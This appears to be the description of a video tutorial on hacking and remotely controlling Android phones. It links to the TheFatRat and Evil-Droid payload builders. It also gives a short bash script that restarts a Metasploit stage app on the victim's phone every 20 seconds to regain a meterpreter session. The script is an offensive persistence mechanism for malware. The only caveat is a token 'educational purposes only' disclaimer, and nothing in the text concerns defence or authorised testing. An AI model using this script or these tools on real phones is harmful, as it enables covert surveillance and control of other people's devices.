Kali Linux - Android Hacking | Beginner to Advance | [FULL COURSE]
Hello,
Today i will show you how to hack and how to control android phones.
Tutorial by AnonHacker.
Download Links:
---
TheFatRat: https://github.com/Screetsec/TheFatRat
EvilDroid: https://github.com/M4sc3r4n0/Evil-Droid
----
startagain.sh CODE:
=============================================
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
=============================================
Every 20 seconds you will get new meterpreter session!
save this code in ".sh" format
=============================================
This video is for educational purposes only!
I'm not responsible for your actions!